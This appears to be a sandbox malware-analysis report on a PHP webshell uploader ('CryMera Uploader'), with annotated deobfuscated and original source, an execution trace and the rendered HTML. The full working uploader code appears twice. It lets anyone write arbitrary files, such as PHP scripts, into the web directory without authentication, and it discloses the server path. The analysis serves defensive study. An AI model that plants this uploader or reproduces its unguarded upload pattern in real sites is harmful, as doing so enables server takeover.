PHP Malware Analysis

bypltd.php

md5: 2f6503a9ebbe4f6cb2115432dd3f5528


Screenshot


Attributes

Environment

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

// Analyst annotation (comments only; the statements are unchanged from the deobfuscated listing).
// Purpose: renders a page titled "./CryMera Uploader" containing a file-upload form, and on
// submission copies the uploaded file into the script's working directory under the name the
// client supplied. Nothing in this listing checks who the requester is or what is being uploaded.

// Favicon and banner image are fetched from a third-party host (g.top4top.io), so every page
// view makes the viewer's browser request that URL; it is usable as a network/content indicator.
echo "<link rel=\"shortcut icon\" href=\"https://g.top4top.io/p_1771gvucn0.png\">";
echo "<center>";
echo "<br><br><br><img height=\"200\" src=\"https://g.top4top.io/p_1771gvucn0.png\"></a>\n";
// The page title is a stable string for signature or log matching.
echo "<title>./CryMera Uploader</title>";
echo "<body style=\"background-color: #272B2E; color: white;\"\nalink=\"#ee0000\" link=\"#0000ee\" vlink=\"#551a8b\">";
echo "<center>";
echo "<br><br>";
// Prints the server-side working directory to whoever loads the page (path disclosure).
// This is the only function call recorded in the execution trace on this page.
echo '<big><span style="color: white;">' . getcwd() . '</span></big><br><br>';
// The form posts back to the same URL as multipart/form-data: file field "mlf", submit field "upl".
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"> \n<input type=\"file\" name=\"mlf\"/>\n<input name=\"upl\" id=\"upl\" type=\"submit\" value=\"upload\" />\n</form>";
// The only gate on the write below is the submit button's value: no session, password or token
// is checked. $_POST['upl'] is read without isset(), and the comparison is loose (==).
// NOTE(review): the trace shows no copy() call, so this branch appears not to have been
// exercised in the sandbox run.
if ($_POST['upl'] == "upload") {
    // copy() is used instead of move_uploaded_file(), and the destination is the client-supplied
    // file name as a relative path, i.e. it resolves against the working directory printed above.
    // No extension, MIME type or size check is applied, and "@" hides any warning from a failed
    // write. In a web-served directory that executes PHP this amounts to unauthenticated
    // arbitrary file upload. The usual controls (server-chosen names, an allow-list of types,
    // script execution disabled in upload directories) are all absent here.
    if (@copy($_FILES['mlf']['tmp_name'], $_FILES['mlf']['name'])) {
        echo "<font size=\"2\" color=\"white\">Succes</font>";
    } else {
        echo "<font size=\"2\" color=\"white\">Failed</font>";
    }
}
// Footer markup: pulls a Font Awesome stylesheet from use.fontawesome.com and links to
// www.itsteamsec.my.id. The "exit ();" inside the string is displayed text wrapped in <font>
// tags, not a PHP exit call, so it does not stop execution.
echo "</body></div><br><br><link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.3.1/css/all.css\"><center>\n<i class=\"fa fa-envelope\"></i>\n<i class=\"fa fa-instagram\"></i>\n<i class=\"fa fa-facebook\"></i>\n<i class=\"fa fa-blog\"></i><br> <br><a href=\"https://www.itsteamsec.my.id\"><font color=\"red\">\n    exit<font color=\"white\"> ()<font color=\"white\">;\n";
?>
<!DOCTYPE html>
<head>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'/>

<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head>
<html>
</body>

</html>

Execution traces

data/traces/2f6503a9ebbe4f6cb2115432dd3f5528_trace-1676245732.3963.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:49:18.294093]
1	0	1	0.000153	393528
1	3	0	0.000218	397848	{main}	1		/var/www/html/uploads/bypltd.php	0	0
2	4	0	0.000235	397848	getcwd	0		/var/www/html/uploads/bypltd.php	15	0
2	4	1	0.000250	397896
2	4	R			'/var/www/html/uploads'
1	3	1	0.000285	397848
			0.000310	314240
TRACE END   [2023-02-12 21:49:18.294280]


Generated HTML code

<html><head><link rel="shortcut icon" href="https://g.top4top.io/p_1771gvucn0.png"></head><body style="background-color: #272B2E; color: white;" alink="#ee0000" link="#0000ee" vlink="#551a8b"><center><br><br><br><img height="200" src="https://g.top4top.io/p_1771gvucn0.png">
<title>./CryMera Uploader</title><center><br><br><big><span style="color: white;">/var/www/html</span></big><br><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"> 
<input type="file" name="mlf">
<input name="upl" id="upl" type="submit" value="upload">
</form><br><br><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><center>
<i class="fa fa-envelope"></i>
<i class="fa fa-instagram"></i>
<i class="fa fa-facebook"></i>
<i class="fa fa-blog"></i><br> <br><a href="https://www.itsteamsec.my.id"><font color="red">
    exit<font color="white"> ()<font color="white">;


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">




</font></font></font></a></center></center></center></body></html>

Original PHP code

<?php
// Analyst annotation: the comments in this listing were added for review and are not part of
// the sample as collected; every statement and string is unchanged.
// The script is not obfuscated. It prints an upload form and copies the submitted file into
// the working directory under the client-supplied name, with no authentication or validation.
 {
// Favicon and banner image load from a third-party host (g.top4top.io).
echo '<link rel="shortcut icon" href="https://g.top4top.io/p_1771gvucn0.png">';
echo '<center>';
echo '<br><br><br><img height="200" src="https://g.top4top.io/p_1771gvucn0.png"></a>
';


echo '<title>./CryMera Uploader</title>';
echo'<body style="background-color: #272B2E; color: white;"
alink="#ee0000" link="#0000ee" vlink="#551a8b">';
echo '<center>';
echo '<br><br>';

// Line 15 of the unannotated sample: the getcwd() call that the execution trace attributes to
// line 15. It prints the server's working directory to the page.
echo '<big><span style="color: white;">'.getcwd().'</span></big><br><br>';

// Form posts to the same URL: file field "mlf", submit field "upl".
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"> 
<input type="file" name="mlf"/>
<input name="upl" id="upl" type="submit" value="upload" />
</form>';
// The outer "if" has no braces, so its body is the single inner if/else statement; the "else"
// binds to the inner copy() test. "Failed" is therefore printed only when the form was
// submitted and copy() returned false, which is the structure the deobfuscated listing makes
// explicit with braces.
// The destination of copy() is the client-supplied file name, and "@" suppresses any warning.
if($_POST['upl'] == "upload")
  if(@copy($_FILES['mlf']['tmp_name'], $_FILES['mlf']['name']))
{echo '<font size="2" color="white">Succes</font>';}
else
{echo '<font size="2" color="white">Failed</font>';}
// Footer markup; the "exit ();" inside the string below is displayed text, not a PHP call.
echo '</body></div><br><br><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><center>
<i class="fa fa-envelope"></i>
<i class="fa fa-instagram"></i>
<i class="fa fa-facebook"></i>
<i class="fa fa-blog"></i><br> <br><a href="https://www.itsteamsec.my.id"><font color="red">
    exit<font color="white"> ()<font color="white">;
';
}
?>
<!DOCTYPE html>
<head>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'/>

<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head>
<html>
</body>

</html>